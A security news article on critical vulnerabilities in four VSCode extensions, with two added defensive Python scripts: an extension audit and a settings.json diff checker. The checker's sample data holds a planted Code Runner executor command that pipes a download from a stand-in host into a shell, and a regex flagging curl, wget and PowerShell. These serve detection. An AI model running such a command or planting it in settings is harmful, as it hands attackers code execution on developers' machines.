Four popular VSCode extensions with over 128 million combined downloads contain critical vulnerabilities that could allow remote code execution and local file theft, prompting urgent security warnings from researchers.
Four popular Visual Studio Code extensions downloaded more than 128 million times collectively contain critical security vulnerabilities that could allow attackers to steal local files and execute code remotely on developers' machines, according to research from application security firm Ox Security.

The affected extensions include Live Server (CVE-2025-65715), Code Runner (CVE-2025-65716), Markdown Preview Enhanced (CVE-2025-65717), and Microsoft Live Preview (no CVE identifier assigned). Despite disclosure attempts beginning in June 2025, Ox Security reports that no maintainers responded to their vulnerability notifications.
The Vulnerabilities Explained
Live Server Extension (72 million downloads)
The most severe of the four, rated critical, affects Live Server. An attacker exploits CVE-2025-65715 by luring the developer to a malicious webpage; from there the page can read files from the developer's machine. The attack depends on Live Server's local development server being up in the background, which is why the mitigations below warn against browsing untrusted content while a localhost server is running. With 72 million downloads, the exposed population is large.
Code Runner Extension (37 million downloads)
Code Runner's CVE-2025-65716 allows remote code execution through the extension's settings rather than through a file it opens. The attacker needs the developer to paste or apply a crafted configuration snippet into the global settings.json file; once those settings are in place, Code Runner executes the attacker-controlled command.
Markdown Preview Enhanced (8.5 million downloads)
Markdown Preview Enhanced carries CVE-2025-65717, a high-severity flaw (CVSS score 8.8) in which a crafted Markdown file triggers JavaScript execution when it is previewed. Because developers routinely open Markdown documentation from repositories they do not control, this is a realistic delivery vector.
Microsoft Live Preview (11 million downloads)
Versions before 0.4.16 contain a one-click cross-site scripting (XSS) flaw that can be used to read sensitive files from the developer's machine; updating to 0.4.16 or later removes it. A single click from the victim is all the attacker needs, which makes this one particularly easy to exploit.
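As an added example (not code from the article or from any of the extension projects), the following script checks an editor's installed extensions against the four named above. It reads the output of `code --list-extensions --show-versions`, one `publisher.name@version` per line, and flags each affected extension, applying the 0.4.16 threshold for Live Preview and treating every installed version of the other three as affected because no fix had been published. The Marketplace identifiers are the ones the extensions are published under, the sample listing is constructed, and the assumption that Cursor and Windsurf accept the same flag through their own launchers (`cursor`, `windsurf`) should be verified on your install.

```python
"""Added example: flag installed VS Code-compatible editor extensions named in
the Ox Security disclosure. Not part of the original article or of the
extensions' own code.

Input is the output of `code --list-extensions --show-versions`
(assumed to work the same way for the `cursor` and `windsurf` launchers).
"""
import re
import sys
from typing import List, Tuple

# Marketplace identifiers for the four extensions (assumed correct; verify
# against your own listing). Only Live Preview has a fixed version on the page
# (0.4.16); the other three had no patch at time of writing, so every installed
# version of them is reported as affected.
AFFECTED = {
    "ritwickdey.liveserver": ("Live Server", "CVE-2025-65715", None),
    "formulahendry.code-runner": ("Code Runner", "CVE-2025-65716", None),
    "shd101wyy.markdown-preview-enhanced": ("Markdown Preview Enhanced", "CVE-2025-65717", None),
    "ms-vscode.live-server": ("Microsoft Live Preview", "no CVE assigned", (0, 4, 16)),
}

# `publisher.name@1.2.3`; extension IDs are case-insensitive, so they are lowercased.
LINE_RE = re.compile(r"^([A-Za-z0-9][\w-]*\.[\w-]+)@(\d+(?:\.\d+)*)")


def parse_version(text: str) -> Tuple[int, ...]:
    """'0.4.15' -> (0, 4, 15); tuples compare component-wise, so (0, 4, 15) < (0, 4, 16)."""
    return tuple(int(part) for part in text.split("."))


def audit(listing: str) -> List[dict]:
    """Return one finding per installed extension that appears in AFFECTED."""
    findings = []
    for raw in listing.splitlines():
        match = LINE_RE.match(raw.strip())
        if not match:
            continue  # blank lines, CLI warnings, anything that is not an extension line
        ext_id, version = match.group(1).lower(), match.group(2)
        if ext_id not in AFFECTED:
            continue
        name, cve, fixed_in = AFFECTED[ext_id]
        vulnerable = fixed_in is None or parse_version(version) < fixed_in
        if fixed_in and vulnerable:
            action = "update to %s or later" % ".".join(map(str, fixed_in))
        elif fixed_in:
            action = "patched"
        else:
            action = "no fix published; disable or uninstall"
        findings.append({
            "id": ext_id,
            "name": name,
            "cve": cve,
            "version": version,
            "vulnerable": vulnerable,
            "action": action,
        })
    return findings


# Constructed sample listing (not captured from a real machine).
SAMPLE_LISTING = """\
esbenp.prettier-vscode@11.0.0
ritwickdey.LiveServer@5.7.9
formulahendry.code-runner@0.12.2
ms-vscode.live-server@0.4.15
shd101wyy.markdown-preview-enhanced@0.8.18
"""


if __name__ == "__main__":
    # Real run:  code --list-extensions --show-versions | python audit_extensions.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LISTING
    for f in audit(text):
        status = "VULNERABLE" if f["vulnerable"] else "ok"
        print(f"{status:10} {f['id']}@{f['version']}  {f['name']} ({f['cve']}): {f['action']}")
```

Run it on every workstation image, not only the one you are sitting at: the same listing format comes out of a remote or container-based editor as well, so the script can be pointed at fleet-wide inventory output without change.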
Broader Impact
The exposure is not limited to VSCode itself. Cursor and Windsurf, the AI-assisted editors built on the VSCode codebase, run the same extensions, so installs of these four extensions in those editors carry the same flaws and widen the population at risk.
Ox Security warns that successful exploitation could give an attacker a foothold on the developer's workstation, from which they could read API keys and configuration files, exfiltrate data, move laterally within the corporate network, or take over the system completely.
Immediate Mitigation Steps
Developers should take the following actions immediately:
- Remove or disable the affected extensions until patched versions are available (for Live Preview, update to 0.4.16 or later)
- Stop local development servers such as Live Server and Live Preview when they are not in use
- Never open untrusted HTML files or web pages while a localhost server is running
- Be extremely cautious about applying configuration snippets or pasting anything into settings.json
- Review installed extensions and remove any that are not essential
- Only install extensions from reputable publishers with an established security track record
- Monitor settings.json for unexpected changes, which can indicate that a malicious snippet has been applied
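To make the last two list items concrete, here is an added example (not from the article or from any of the extension projects) that diffs a saved known-good copy of settings.json against the current file and rates each change. It covers the Code Runner settings manipulation described above as well: a crafted snippet has to land in settings.json, so a baseline diff catches it. The setting namespaces (`code-runner.`, `liveServer.`, `livePreview.`, `markdown-preview-enhanced.`) are the extensions' real configuration prefixes; the assumption that a malicious snippet would carry a shell command, the risky-string heuristic and the two sample documents are mine.

```python
"""Added example: rate changes between a known-good settings.json and the
current one, weighting keys that belong to the four affected extensions.
Not part of the original article or of any extension's own code.

Typical paths for the user settings file:
  macOS   ~/Library/Application Support/Code/User/settings.json
  Linux   ~/.config/Code/User/settings.json
  Windows %APPDATA%\\Code\\User\\settings.json
Cursor and Windsurf keep their own copies under their own application folders.
"""
import json
import re
import sys
from typing import Any, Dict, List

# Configuration namespaces used by the affected extensions.
WATCHED_PREFIXES = ("code-runner.", "liveServer.", "livePreview.", "markdown-preview-enhanced.")

# Heuristic for string values that run or fetch something. Assumption: a crafted
# Code Runner snippet would most likely plant a command; the article does not
# describe the exact shape of the malicious snippet.
RISKY_VALUE = re.compile(
    r"\$\(|`|\|\s*(?:sh|bash|zsh|powershell|pwsh)\b|&&|;"
    r"|\b(?:curl|wget|iex|Invoke-Expression|powershell|pwsh)\b|-enc(?:odedcommand)?\b",
    re.IGNORECASE,
)


def load_settings(text: str) -> Dict[str, Any]:
    """settings.json is JSON with comments. Strip whole-line // comments and
    trailing commas before parsing (best effort, not a full JSONC parser)."""
    text = re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text)


def flatten(obj: Any, prefix: str = "") -> Dict[str, Any]:
    """Turn nested objects into dotted leaf paths so a single changed entry in,
    say, code-runner.executorMap is reported on its own."""
    if not isinstance(obj, dict):
        return {prefix: obj}
    out: Dict[str, Any] = {}
    for key, value in obj.items():
        path = f"{prefix}.{key}" if prefix else key
        out.update(flatten(value, path))
    return out


def audit_changes(baseline: Dict[str, Any], current: Dict[str, Any]) -> List[dict]:
    """Compare two settings documents and rate every added, removed or changed leaf."""
    before, after = flatten(baseline), flatten(current)
    findings = []
    for path in sorted(set(before) | set(after)):
        old, new = before.get(path), after.get(path)
        if old == new:
            continue
        watched = path.startswith(WATCHED_PREFIXES)
        risky = isinstance(new, str) and bool(RISKY_VALUE.search(new))
        severity = "high" if watched and risky else "medium" if watched or risky else "low"
        findings.append({"path": path, "old": old, "new": new, "severity": severity})
    return findings


# Constructed sample documents (not real captured settings).
BASELINE_JSON = """{
  // saved when the workstation was set up
  "editor.fontSize": 14,
  "code-runner.executorMap": {
    "python": "python -u",
  },
}
"""
CURRENT_JSON = """{
  "editor.fontSize": 15,
  "code-runner.executorMap": {
    "python": "sh -c 'curl -s example.invalid/p | sh'"
  },
  "liveServer.settings.root": "/"
}
"""


if __name__ == "__main__":
    # Real run:  python audit_settings.py baseline.json current.json
    if len(sys.argv) == 3:
        with open(sys.argv[1], encoding="utf-8") as fh:
            base = load_settings(fh.read())
        with open(sys.argv[2], encoding="utf-8") as fh:
            cur = load_settings(fh.read())
    else:
        base, cur = load_settings(BASELINE_JSON), load_settings(CURRENT_JSON)
    for f in audit_changes(base, cur):
        print(f"[{f['severity']:6}] {f['path']}: {f['old']!r} -> {f['new']!r}")
```

The severity split is deliberate: a changed font size is noise, a new Live Server root is worth a look, and an executor command that pipes a download into a shell is the case the list item is warning about. Refresh the baseline copy only after you have reviewed a diff, never automatically.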
The Larger Context
This incident highlights the security risks inherent in the modern development ecosystem. VSCode extensions run in the editor's extension host with the same operating-system privileges as the developer and without a sandbox: they can read and write local files, spawn terminals and processes, and make network connections. A vulnerable extension is therefore a privileged entry point into the developer's environment.
The lack of maintainer response to the disclosures is particularly troubling. It underscores why extension choice should favour actively maintained projects whose maintainers answer security reports.
For organizations, this incident should prompt a review of development environment security policies, including extension usage guidelines and monitoring for suspicious configuration changes. The potential for lateral movement means that a compromised developer workstation could serve as a springboard for broader network attacks.
Until the respective maintainers ship fixes, the safest approach is to operate with a minimal set of trusted extensions and to keep the affected ones disabled.
